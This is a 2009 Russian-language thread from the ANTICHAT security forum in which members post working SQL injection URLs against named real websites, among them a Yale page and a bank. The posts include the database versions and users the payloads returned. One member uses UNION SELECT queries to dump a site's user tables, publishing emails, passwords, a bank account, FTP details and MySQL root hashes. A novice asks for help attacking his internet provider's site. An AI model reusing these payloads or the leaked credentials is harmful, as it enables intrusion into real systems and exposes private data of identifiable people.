HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.01.2009, 18:14
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
По умолчанию

Код:
http://www.swschool.org/news_detail.php?id=-1+union+select+1,version(),user(),database()/*
version: 4.1.20
user: ssac@mrcrabs.toolbox.net
database: ssac

Код:
http://articles.student.com/article.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14/*
version: 4.0.21-standard-log
user: webuser@web1
database: studcent

Код:
http://www.opednews.com/maxwrite/link.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11/*
version: 4.1.22-standard-log
user: opednews_vidya@localhost
database: opednews_pearl

Код:
http://energyteachers.org/ReadArticle.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*
version: 5.0.45-log
user: etouser@205.178.145.65
database: eto

Код:
http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
version: 4.1.22-standard-log
user: 334937_alfred@172.16.11.218
database: 334937_calcms

Код:
http://rwjcsp.yale.edu/community.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
version: 4.0.24-log
user: rwjEditor@web.med.yale.edu
database: rwj

Код:
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/*
version: 4.0.27-standard-log
user: dbo120565932@212.227.119.149
database: db120565932

Код:
http://www.business-academy.ru/viezd.php?id=-1+union+select+1,version(),3,4,5/*
version: 5.0.45-Max-log
user: srv11037_forum21@c29-w.ht-systems.ru
database: srv11037_forum

user: lenar
pass: vcxzasdf123

Код:
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/*
version: 5.0.45-log
user: oxid@localhost
database: synaptic

http://www.conex.biz.ua/auction.php?id=-1+union+select+1,version(),3/*

version: 4.1.22-log
user: conex@alpha
database: conex
 
Ответить с цитированием

  #2  
Старый 03.01.2009, 19:59
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Народ, помогите ламеру!!!
Нашол уязвимость, полей 15, а что дальше делать,понять не могу. Вставлял любые коды, везде ошибка. попробуйте вы...скажите где ошибка
 
Ответить с цитированием

  #3  
Старый 03.01.2009, 20:01
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
 
Ответить с цитированием

  #4  
Старый 03.01.2009, 20:05
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
По умолчанию

Цитата:
Сообщение от vakula  
http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
PHP код:
Forbidden    You don't have permission to access / on this server. 
гм...
 
Ответить с цитированием

  #5  
Старый 03.01.2009, 20:11
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Цитата:
Сообщение от ..::TROYAN::..  
PHP код:
Forbidden    You don't have permission to access / on this server. 
гм...
это сайт провайдера нашего....возможно вас просто не пускают
 
Ответить с цитированием

  #6  
Старый 03.01.2009, 20:14
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,version(),16,17/*

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/igor/public_html/megaload/program.php on line 121
 
Ответить с цитированием

  #7  
Старый 04.01.2009, 02:21
vladvk
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223

Репутация: 7
По умолчанию

synaptic.ru
Докрутил, но такого еще не видел, не стал разбираться что куда сувать надо:
Если кто будет раэбираться,потом пожалуйста отпишитесь
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(bank_account,char(58),ba nk_name,char(58),email,char(58),char(58),password) ,4,5,6,7,8,9,10,11,12,13+from+synaptic.users/*
::tapakaiiika@yandex.ru::620be1
40702810990010002180:САНКТ-ПЕТЕРБУРГСКИЙ Ф-Л АКБ "СОЮЗ" (ОАО):vsevolod.trofimov@synaptic.ru::uu876ujih9 8
:lga160@rambler.ru::983016
::a_fedotov@pochta.ru::f7fb60
::metelev2007@mail.ru::584889
::rg.90@mail.ru::1d6b57
::evseevigor@mail.ru::34a06e
:lefimova@gmail.com::436c69
::IVAN VESELOV@SYNAPTIC.RU::b0b906
::IVAN.VESELOV@SYNAPTIC.RU::cbfcdf
::honda-civic@list.ru::5188dc
::spawnok@spawnok.com::0ebf27
::sergey.g@freenet.de::4e1891

http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),pass),4,5, 6,7,8,9,10,11,12,13+from+psy.users/*
Всеволод Викторович Трофимов:vsev
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5 ,6,7,8,9,10,11,12,13+from+oxid.users/*
seva:vsev
efaberge:eggs
jurist:140382
igorv112:qazwsxedc
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char (58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.opini on_users/*
seva:vsevolod@artlinemedia.ru:ceb3e6
Всеволод:seva@artlinemedia.ru:282573
Сева:music@yandex.ru:c65cfa
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(host,char(58),port,char( 58),user,char(58),pass),4,5,6,7,8,9,10,11,12,13+fr om+oxid.ftp_servers/*
mp3.int.ru:21:anonymous:doh@doh.doh
212.182.63.138:21:anonymous:doh@doh.doh
216.71.74.4:21:anonymous:doh@doh.doh
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5 ,6,7,8,9,10,11,12,13+from+oxid.developers_app/*
oxid:vbiflt
oxid1:vsev
nitroamplifire:xiquliquitrux
winampmaniw
leosoft:leoam
DJUSHMAN:andron
gf:gf
Yliya:01071986
Ylizka:01071986
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char (58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.autho r/*
Эстрина Инна:inch@molinos.ru:ghjtrn
РОФФ ТЕКНОЛОДЖИЗ:svetlana@roff.ru:techno
Агентство "Выше Радуги":esmi@uprainbow.ru:rainbow
Урюпин Д.А.:gebo@land.ru:kalendar
openmusic.rupenmusic@openmusic.ru:rainbow
:info@kushnir.ruroduction
:info@castlerock.ru:rok
Лебедева Елена:internet@kushnir.ru:kushnirint
Оксана и Егор:eglute@nm.ru:3214фф
Саванчук Катерина:marsinred@mail.ru:123фыв
Мария Карпеева:thedevoted@mail.ru:ghrtt
Евгения Карасева:ekarasyova@mail.ru:dsdw2
Елена Волосова:volosova@reakcia.ru:action
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Password,c har(58),User),4,5,6,7,8,9,10,11,12,13+from+mysql.u ser/*
:357a136b2575f97f:root :5be372e038520af0xid localhost:4844f090239f56e0:wikiuser :499bd4ec632aac25:dmitr
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Db,char(58 ),User),4,5,6,7,8,9,10,11,12,13+from+mysql.db/*
%:xid %:test: %:test\_%: %:wikidb:wikiuser
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(email,char(58),password) ,4,5,6,7,8,9,10,11,12,13+from+malkov.users/*
email@email.ro: 2222:п
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),password) ,4,5,6,7,8,9,10,11,12,13+from+identification.users +limit+0,1/*
seva:vsev Larisa:gammy
 
Ответить с цитированием

  #8  
Старый 04.01.2009, 02:28
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Скажи плиз...где ты названия таблиц брал!! У меня уже крышу сносит! Помоги нубу
 
Ответить с цитированием

  #9  
Старый 03.01.2009, 23:37
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Всё...всем спасибо...тупо провтыкал куда ставить запрос
 
Ответить с цитированием

  #10  
Старый 04.01.2009, 00:26
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

народ. подскажите как можна вытянуть имя таблицы для получения pass?

http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.